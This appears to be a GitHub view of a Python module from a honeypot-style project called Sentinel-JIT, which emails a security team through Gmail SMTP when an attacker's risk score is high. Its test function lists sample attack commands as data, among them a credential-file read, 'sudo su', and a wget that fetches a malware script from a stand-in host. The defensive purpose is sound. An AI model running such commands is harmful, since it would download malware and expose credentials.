-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathalert_engine.py
More file actions
212 lines (182 loc) · 6.93 KB
/
alert_engine.py
File metadata and controls
212 lines (182 loc) · 6.93 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
# =============================================================================
# alert_engine.py
# Sentinel-JIT — Email Alert System
# =============================================================================
#
# PURPOSE:
# When the risk engine detects HIGH risk (score > 70), this module
# sends an automatic email alert to a security official using Gmail.
#
# HOW IT WORKS:
# - Uses Python's built-in smtplib (no extra packages needed)
# - Reads Gmail credentials from the .env file
# - Sends a formatted incident alert email
#
# SETUP (one-time, takes 2 minutes):
# 1. Go to myaccount.google.com/apppasswords
# 2. Create an App Password for "Mail"
# 3. Add to .env:
# ALERT_SENDER_EMAIL=your-gmail@gmail.com
# ALERT_SENDER_PASSWORD=your-16-char-app-password
# ALERT_RECIPIENT_EMAIL=security-team@example.com
#
# =============================================================================
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from typing import Dict, List, Optional
# Load .env automatically
try:
from dotenv import load_dotenv
load_dotenv(override=True)
except ImportError:
pass
# ---------------------------------------------------------------------------
# FUNCTION: build_alert_email
# ---------------------------------------------------------------------------
def build_alert_email(
source_ip: str,
risk_score: int,
risk_level: str,
stage_summary: Dict[str, List[str]],
) -> str:
"""
Builds a plain-text email body for the security alert.
Args:
source_ip : IP address of the attacker
risk_score : Calculated risk score (0-100)
risk_level : "HIGH", "MEDIUM", or "LOW"
stage_summary: Dict of {stage: [commands]} from ai_analysis
Returns:
str: Formatted email body text
"""
sep = "=" * 55
thin = "-" * 55
body = sep + "\n"
body += " SENTINEL-JIT SECURITY ALERT\n"
body += sep + "\n\n"
body += "STATUS : HIGH RISK DETECTED\n"
body += "ACTION : Attacker redirected into decoy environment\n\n"
body += thin + "\n"
body += "INCIDENT DETAILS\n"
body += thin + "\n"
body += "Attacker IP : " + source_ip + "\n"
body += "Risk Score : " + str(risk_score) + " / 100\n"
body += "Risk Level : " + risk_level + "\n"
body += "Decoy Active : YES\n\n"
body += thin + "\n"
body += "ATTACK STAGES DETECTED\n"
body += thin + "\n"
for stage, cmds in stage_summary.items():
body += " [" + stage + "]\n"
for c in cmds:
body += " - " + c + "\n"
body += "\n" + thin + "\n"
body += "RECOMMENDED ACTIONS\n"
body += thin + "\n"
body += " 1. Block attacker IP at firewall immediately.\n"
body += " 2. Review all files accessed in the decoy.\n"
body += " 3. Rotate credentials on the affected system.\n"
body += " 4. Preserve all logs for forensic investigation.\n\n"
body += sep + "\n"
body += " Alert generated by Sentinel-JIT\n"
body += " Dashboard: http://localhost:8501\n"
body += sep + "\n"
return body
# ---------------------------------------------------------------------------
# FUNCTION: send_alert_email
# ---------------------------------------------------------------------------
def send_alert_email(
source_ip: str,
risk_score: int,
risk_level: str,
stage_summary: Optional[Dict[str, List[str]]] = None,
) -> bool:
"""
Sends a HIGH RISK alert email via Gmail SMTP.
Reads credentials from environment variables (set in .env):
ALERT_SENDER_EMAIL — your Gmail address
ALERT_SENDER_PASSWORD — Gmail App Password (16 chars)
ALERT_RECIPIENT_EMAIL — who receives the alert
Args:
source_ip : Attacker's IP address
risk_score : Calculated risk score
risk_level : Risk level string
stage_summary: Optional dict of attack stages and commands
Returns:
True if email was sent successfully
False if credentials missing or send failed
"""
# Step 1: Read credentials from environment
sender_email = os.environ.get("ALERT_SENDER_EMAIL", "")
sender_pass = os.environ.get("ALERT_SENDER_PASSWORD", "")
recipient_email = os.environ.get("ALERT_RECIPIENT_EMAIL", "")
if not sender_email or not sender_pass or not recipient_email:
print("[ALERT] Email credentials not set in .env — skipping alert.")
print("[ALERT] Add ALERT_SENDER_EMAIL, ALERT_SENDER_PASSWORD,")
print("[ALERT] and ALERT_RECIPIENT_EMAIL to your .env file.")
return False
# Step 2: Build the email body
summary = stage_summary or {}
body = build_alert_email(source_ip, risk_score, risk_level, summary)
# Step 3: Compose the MIME email message
msg = MIMEMultipart("alternative")
msg["Subject"] = (
"[SENTINEL-JIT] HIGH RISK ALERT — Attacker Detected"
" | IP: " + source_ip
+ " | Score: " + str(risk_score) + "/100"
)
msg["From"] = sender_email
msg["To"] = recipient_email
msg.attach(MIMEText(body, "plain"))
# Step 4: Send via Gmail SMTP
try:
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
server.login(sender_email, sender_pass)
server.sendmail(sender_email, recipient_email, msg.as_string())
print("[ALERT] Email alert sent to: " + recipient_email)
return True
except smtplib.SMTPAuthenticationError:
print("[ALERT] Gmail authentication failed.")
print("[ALERT] Make sure you are using an App Password, not your")
print("[ALERT] regular Gmail password.")
print("[ALERT] Get one at: myaccount.google.com/apppasswords")
return False
except Exception as e: # noqa: BLE001
print("[ALERT] Failed to send email: " + str(e))
return False
# ---------------------------------------------------------------------------
# STANDALONE TEST — run directly to test email
# ---------------------------------------------------------------------------
def main() -> None:
"""
Test the alert email with sample data.
Run with: python3 alert_engine.py
"""
print("=" * 55)
print(" Sentinel-JIT — Alert Engine Test")
print("=" * 55)
print()
test_stages = {
"Reconnaissance": ["whoami", "id", "uname -a"],
"Discovery": ["ls", "cd /home"],
"Credential Access": ["cat passwords.txt"],
"Malware Deployment": ["wget http://malware.example.com/malware.sh"],
"Privilege Escalation": ["sudo su"],
}
success = send_alert_email(
source_ip="192.168.1.45",
risk_score=90,
risk_level="HIGH",
stage_summary=test_stages,
)
if success:
print()
print("Test complete — check your inbox.")
else:
print()
print("Email not sent. Add credentials to .env and try again.")
print("=" * 55)
if __name__ == "__main__":
main()